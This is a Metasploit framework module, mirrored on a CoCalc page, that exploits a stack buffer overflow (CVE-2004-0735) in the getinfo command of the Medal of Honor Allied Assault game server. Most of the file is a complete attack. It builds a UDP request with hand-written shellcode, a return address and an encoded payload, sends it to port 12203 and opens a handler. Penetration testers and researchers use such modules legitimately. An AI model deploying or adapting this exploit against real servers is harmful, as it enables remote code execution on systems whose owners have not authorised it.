CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/games/mohaa_getinfo.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Medal of Honor Allied Assault getinfo Stack Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack based buffer overflow in the getinfo

16
        command of Medal Of Honor Allied Assault.

17
      },

18
      'Author'         => [ 'Jacopo Cervini' ],

19
      'License'        => BSD_LICENSE,

20
      'References'     =>

21
        [

22
          [ 'CVE', '2004-0735'],

23
          [ 'OSVDB', '8061' ],

24
          [ 'EDB', '357'],

25
          [ 'BID', '10743'],

26
        ],

27
      'Privileged'     => false,

28
      'Payload'        =>

29
        {

30
          'Space'    => 512,

31
          'BadChars' => "\x00",

32
        },

33
      'Platform'       => 'win',

34
      'Targets'        =>

35
        [

36
          ['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx

37
        ],

38
      'DisclosureDate' => '2004-07-17',

39
      'DefaultTarget' => 0))

40


41
    register_options(

42
      [

43
        Opt::RPORT(12203)

44
      ])

45
  end

46


47
  def exploit

48
    connect_udp

49


50
    # We should convert this to metasm - Patrick

51
    buf = 'B' * target['Rets'][0]

52
    buf << "\x68\x76\x76\x76\x76"*9   	# PUSH 76767676 x 9

53
    buf << "\x68\x7f\x7f\x7f\x7f"     	# PUSH 7F7F7F7F

54
    buf << "\x57"			    	# PUSH EDI

55
    buf << "\x58"			    	# POP EAX

56
    buf << "\x32\x64\x24\x24"	    	# XOR AH,BYTE PTR SS:[ESP+24]

57
    buf << "\x32\x24\x24"		    	# XOR AH,BYTE PTR SS:[ESP]

58
    buf << "\x48"*150			    	# DEC EAX x 150

59
    buf << "\x50\x50"			    	# PUSH EAX x 2

60
    buf << "\x53"				# PUSH EBX

61
    buf << "\x58"				# POP EAX

62
    buf << "\x51"				# PUSH ECX

63
    buf << "\x32\x24\x24"			# XOR AH,BYTE PTR SS:[ESP]

64
    buf << "\x6a\x7f"				# PUSH 7F

65
    buf << "\x5e"				# POP ESI

66
    buf << "\x46"*37				# INC ESI

67
    buf << "\x56"*10				# PUSH ESI

68
    buf << "\x32\x44\x24\x24"		# XOR AL,BYTE PTR SS:[ESP+24]

69
    buf << "\x49\x49"				# DEC ECX

70
    buf << "\x31\x48\x34"			# XOR DWORD PTR DS:[EAX+34],ECX

71
    buf << "\x58"*11				# POP EAX

72
    buf << "\x42"*66

73
    buf << "\x3c"*4

74
    buf << "\x42"*48

75
    buf << [ target['Rets'][1] ].pack('V')

76


77
    req = "\xff\xff\xff\xff\x02" + "getinfo " + buf

78
    req << "\r\n\r\n" + make_nops(32) + payload.encoded

79


80
    udp_sock.put(req)

81


82
    handler

83
    disconnect_udp

84
  end

85
end

86


87